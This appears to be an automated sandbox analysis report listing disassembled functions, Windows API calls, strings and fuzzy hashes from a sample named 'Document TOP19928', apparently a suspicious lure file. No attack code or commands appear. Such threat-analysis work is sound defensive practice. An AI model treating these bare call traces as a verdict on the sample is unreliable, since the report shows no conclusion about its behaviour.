Opcode ID: bdf545e0108a75bd6c64558cd0e677d570586b3bc93326ee41076b0f6d374f28
Instruction ID: 13cc9a68a4a2b43047b97164948052165586373702a0a2f5abc37a1906144f04
Opcode Fuzzy Hash: bdf545e0108a75bd6c64558cd0e677d570586b3bc93326ee41076b0f6d374f28
Instruction Fuzzy Hash: F2317832105215ABDF129FA4EC08FDA3BA9FF0D322F104225FA15E61A1D7359825DBA4

Function 007F7040 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007F707B

Part of subcall function 007F8D68: __getptd_noexit.LIBCMT ref: 007F8D68

__gmtime64_s.LIBCMT ref: 007F7114
__gmtime64_s.LIBCMT ref: 007F714A
__gmtime64_s.LIBCMT ref: 007F7167
__allrem.LIBCMT ref: 007F71BD
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007F71D9
__allrem.LIBCMT ref: 007F71F0
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007F720E
__allrem.LIBCMT ref: 007F7225
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007F7243
__invoke_watson.LIBCMT ref: 007F72B4

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
Instruction ID: 2f04ad0b30fd94ed01dc5088068b80fe8097fd7a0ae6a28b2de96f7ce02c8f1c
Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
Instruction Fuzzy Hash: 43719371A0471AEBE7189E79CC41B7AB3B8BF55320F14822AF614D63C1EB78DA50C791

Function 00832A16 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00832A31
GetMenuItemInfoW.USER32(00896890,000000FF,00000000,00000030), ref: 00832A92
SetMenuItemInfoW.USER32(00896890,00000004,00000000,00000030), ref: 00832AC8
Sleep.KERNEL32(000001F4), ref: 00832ADA
GetMenuItemCount.USER32(?), ref: 00832B1E
GetMenuItemID.USER32(?,00000000), ref: 00832B3A
GetMenuItemID.USER32(?,-00000001), ref: 00832B64
GetMenuItemID.USER32(?,?), ref: 00832BA9
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00832BEF
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00832C03
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00832C24

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: cab42112a922fd5cc87bd43ce9e4316863d79b36238cfb5b08f08916e8f81740
Instruction ID: a2cb1ea40e934bad2e9d63ecab8461d6b1d7c681124be01fe282d92ac2f708e1
Opcode Fuzzy Hash: cab42112a922fd5cc87bd43ce9e4316863d79b36238cfb5b08f08916e8f81740
Instruction Fuzzy Hash: 3D61BFB0900249EFDF21DFA4D888EBEBBB8FB80314F140459E941E7251E735AD16DBA1

Function 00857192 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00857214
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00857217
GetWindowLongW.USER32(?,000000F0), ref: 0085723B
_memset.LIBCMT ref: 0085724C
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0085725E
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 008572D6

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: c7dd6b30c5db39e265391543eea105579a0d42e2723df7c2ccc138afe377c6fc
Instruction ID: 36acb2b81a0ee21e8599c39165675b8e3270428d7d14661f6ca2737492d8cfce
Opcode Fuzzy Hash: c7dd6b30c5db39e265391543eea105579a0d42e2723df7c2ccc138afe377c6fc
Instruction Fuzzy Hash: DD614771900208ABDB10DFA4DC81EEE77B8FB09714F14416AFE14E73A1D774AA59DB60

Function 0082710E Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00827135
SafeArrayAllocData.OLEAUT32(?), ref: 0082718E
VariantInit.OLEAUT32(?), ref: 008271A0
SafeArrayAccessData.OLEAUT32(?,?), ref: 008271C0
VariantCopy.OLEAUT32(?,?), ref: 00827213
SafeArrayUnaccessData.OLEAUT32(?), ref: 00827227
VariantClear.OLEAUT32(?), ref: 0082723C
SafeArrayDestroyData.OLEAUT32(?), ref: 00827249
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00827252
VariantClear.OLEAUT32(?), ref: 00827264
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0082726F

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 2934c24bee459ae7e47c09a4b3b13fb2f30e2f3d585f714fdbd4e23c0cf7b50a
Instruction ID: 358705eca70cbacd227d60f92cb7eac710020c6ae064039f5deefbc520838e16
Opcode Fuzzy Hash: 2934c24bee459ae7e47c09a4b3b13fb2f30e2f3d585f714fdbd4e23c0cf7b50a
Instruction Fuzzy Hash: 43415435900229EFCF00EF69D848DAEBBB9FF48355F008065FA56E7261DB34A945CB90

Function 00845A45 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000101,?), ref: 00845AA6
inet_addr.WS2_32(?), ref: 00845AEB
gethostbyname.WS2_32(?), ref: 00845AF7
IcmpCreateFile.IPHLPAPI ref: 00845B05
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00845B75
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00845B8B
IcmpCloseHandle.IPHLPAPI(00000000), ref: 00845C00
WSACleanup.WS2_32 ref: 00845C06

Strings

Ping, xrefs: 00845B29

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: ba32813b98f558764f24b2295fcacf00c6889a394950d2e7844d8b903c29940d
Instruction ID: 0101fed5f7175627b3be9ac92a751c15491e2e66dc62a76a51f86cd5a99034cd
Opcode Fuzzy Hash: ba32813b98f558764f24b2295fcacf00c6889a394950d2e7844d8b903c29940d
Instruction Fuzzy Hash: C1516C316047149FD711AF24CC49B2EBBE4FF48724F14892AF656DB2A2DB74E8408B52

Function 0083B72E Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0083B73B
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0083B7B1
GetLastError.KERNEL32 ref: 0083B7BB
SetErrorMode.KERNEL32(00000000,READY), ref: 0083B828

Strings

READONLY, xrefs: 0083B7F3
UNKNOWN, xrefs: 0083B7E0
READY, xrefs: 0083B801
NOTREADY, xrefs: 0083B7E7
INVALID, xrefs: 0083B7FA

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 7d0b646bc681fc42c8f93903103b54d1e53799ea3b9b3ca3f6f32adce9900dce
Instruction ID: d7abaf10cb1e200cf308b3b10f9524f430a18d87abebe6da8fd7254608328aeb
Opcode Fuzzy Hash: 7d0b646bc681fc42c8f93903103b54d1e53799ea3b9b3ca3f6f32adce9900dce
Instruction Fuzzy Hash: B0319475A40209EFDB04EF64C889AAE7BB4FF84744F10402AE601D7391DB759D42C791

Function 00829471 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 007D7F41: _memmove.LIBCMT ref: 007D7F82

Part of subcall function 0082B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0082B0E7

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 008294F6
GetDlgCtrlID.USER32 ref: 00829501
GetParent.USER32 ref: 0082951D
SendMessageW.USER32(00000000,?,00000111,?), ref: 00829520
GetDlgCtrlID.USER32(?), ref: 00829529
GetParent.USER32(?), ref: 00829545
SendMessageW.USER32(00000000,?,?,00000111), ref: 00829548

Strings

ComboBox, xrefs: 0082947E
ListBox, xrefs: 008294B3

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: b3d71796715feef53d7587e251750749a7ef5fa2f46c64a5f0a15aedcbb877fe
Instruction ID: 7fd1793ea50763533c07991276fe99be9a4afa59f10c718e8a7aa8ff96f8d718
Opcode Fuzzy Hash: b3d71796715feef53d7587e251750749a7ef5fa2f46c64a5f0a15aedcbb877fe
Instruction Fuzzy Hash: 0F21D670A00214BBCF05AB64DC85EFEBBB4FF55300F104116FA61972E2EB795959DB20

Function 0082955C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

Part of subcall function 007D7F41: _memmove.LIBCMT ref: 007D7F82

Part of subcall function 0082B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0082B0E7

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 008295DF
GetDlgCtrlID.USER32 ref: 008295EA
GetParent.USER32 ref: 00829606
SendMessageW.USER32(00000000,?,00000111,?), ref: 00829609
GetDlgCtrlID.USER32(?), ref: 00829612
GetParent.USER32(?), ref: 0082962E
SendMessageW.USER32(00000000,?,?,00000111), ref: 00829631

Strings

ComboBox, xrefs: 00829569
ListBox, xrefs: 0082959E

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 194e85a239c7f4a96f9532dbaf21981ecd5dbf43d524f1b5f74e70e728cd687a
Instruction ID: 56191f1ff80a3a8b00b278ae9f491331c9462aba780fbfc6696f3ec8bddafd89
Opcode Fuzzy Hash: 194e85a239c7f4a96f9532dbaf21981ecd5dbf43d524f1b5f74e70e728cd687a
Instruction Fuzzy Hash: 5A21D670A00214BBDF05AB60CC85EFEBBB8FF58300F104116F961972A2EB795959DB20

Function 00829645 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00829651
GetClassNameW.USER32(00000000,?,00000100), ref: 00829666
_wcscmp.LIBCMT ref: 00829678
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 008296F3

Strings

largeicons, xrefs: 00829687
SHELLDLL_DefView, xrefs: 00829672
smallicons, xrefs: 008296BB
details, xrefs: 008296A1
list, xrefs: 008296D5

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: 50973246246e2144c030464504ac80d5bb5dc73da81d5236a495808be72f2aa0
Instruction ID: 41d89a6dd4083a733222372304537bc333e3f9fdc1a4914352f120a39686d08d
Opcode Fuzzy Hash: 50973246246e2144c030464504ac80d5bb5dc73da81d5236a495808be72f2aa0
Instruction Fuzzy Hash: FA110A7624832FFAFA013624EC0ADB777DCFF24364F200026FA50E51D2FE5959909658

Function 00834189 Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 0083419D
__swprintf.LIBCMT ref: 008341AA

Part of subcall function 007F38D8: __woutput_l.LIBCMT ref: 007F3931

FindResourceW.KERNEL32(?,?,0000000E), ref: 008341D4
LoadResource.KERNEL32(?,00000000), ref: 008341E0
LockResource.KERNEL32(00000000), ref: 008341ED
FindResourceW.KERNEL32(?,?,00000003), ref: 0083420D
LoadResource.KERNEL32(?,00000000), ref: 0083421F
SizeofResource.KERNEL32(?,00000000), ref: 0083422E
LockResource.KERNEL32(?), ref: 0083423A
CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 0083429B

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
String ID:
API String ID: 1433390588-0
Opcode ID: 7b64878947071d6b34119172cbf6019901cb732003c8ee2e4a75e7bb98b60128
Instruction ID: aa15a6d8dcf69d0a6f0d5926d6b2f963e0a08bac24f495eff8d3e8de78e036d1
Opcode Fuzzy Hash: 7b64878947071d6b34119172cbf6019901cb732003c8ee2e4a75e7bb98b60128
Instruction Fuzzy Hash: 9731B2B160520AAFDB119F60DC48EBF7BADFF44302F044525FA05E2151D778E951CBA0

Function 008316DE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00831700
GetForegroundWindow.USER32(00000000,?,?,?,?,?,00830778,?,00000001), ref: 00831714
GetWindowThreadProcessId.USER32(00000000), ref: 0083171B
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00830778,?,00000001), ref: 0083172A
GetWindowThreadProcessId.USER32(?,00000000), ref: 0083173C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00830778,?,00000001), ref: 00831755
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00830778,?,00000001), ref: 00831767
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00830778,?,00000001), ref: 008317AC
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00830778,?,00000001), ref: 008317C1
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00830778,?,00000001), ref: 008317CC

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 0cedfc8d2eb40233445efb60ae40356effe4f0c2cd472b8d083bbf78b5e00eea
Instruction ID: 6dc937a396202dbb1e2411ef35ada58d7f39e5cb7348fe381c3e7d40ae8ad979
Opcode Fuzzy Hash: 0cedfc8d2eb40233445efb60ae40356effe4f0c2cd472b8d083bbf78b5e00eea
Instruction Fuzzy Hash: F7319175614304BBEF11AF24DC88F797BE9FB95B12F184026F906D72A4DB789D408BA0

Function 007DFBBD Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 007DFC06
OleUninitialize.OLE32(?,00000000), ref: 007DFCA5
UnregisterHotKey.USER32(?), ref: 007DFDFC
DestroyWindow.USER32(?), ref: 00814A00
FreeLibrary.KERNEL32(?), ref: 00814A65
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00814A92

Strings

close all, xrefs: 007DFC01

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: e2017a5736c6dd78b884cd8740a2d20edcc255d7f09d68c775c47440d393fa09
Instruction ID: b615079accb6c381dfc67faf8a56b5f52c28439a78fe17fd2d752fcc0a8f4dd4
Opcode Fuzzy Hash: e2017a5736c6dd78b884cd8740a2d20edcc255d7f09d68c775c47440d393fa09
Instruction Fuzzy Hash: 60A14A30701222CFCB29EB14C499A69F778FF04710F1552AEE90AAB352DB34AD56CF94

Function 0082A693 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,0082AA64), ref: 0082A9A2

Strings

TEXT, xrefs: 0082A8D9
CLASSNN, xrefs: 0082A744
REGEXPCLASS, xrefs: 0082A767
NAME, xrefs: 0082A7D4
INSTANCE, xrefs: 0082A8B0
CLASS, xrefs: 0082A721

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: fec5c2f0c214fafcbc55198a1f50388e482a91d89d4385d6aec203c25f677244
Instruction ID: 52ce1cbf76e0a9b6d7b1b04cccebc61bf1b977a44dc27d305c5c8a9cacde2e07
Opcode Fuzzy Hash: fec5c2f0c214fafcbc55198a1f50388e482a91d89d4385d6aec203c25f677244
Instruction Fuzzy Hash: 41919E7060061AEBCB1CEFA0D485BE9FB74FF04304F508129D99AE7241DB346AD9CBA1

Function 007D2E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 007D2EAE

Part of subcall function 007D1DB3: GetClientRect.USER32(?,?), ref: 007D1DDC
Part of subcall function 007D1DB3: GetWindowRect.USER32(?,?), ref: 007D1E1D
Part of subcall function 007D1DB3: ScreenToClient.USER32(?,?), ref: 007D1E45

GetDC.USER32 ref: 0080CF82
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0080CF95
SelectObject.GDI32(00000000,00000000), ref: 0080CFA3
SelectObject.GDI32(00000000,00000000), ref: 0080CFB8
ReleaseDC.USER32(?,00000000), ref: 0080CFC0
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0080D04B

Strings

U, xrefs: 0080CF20

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

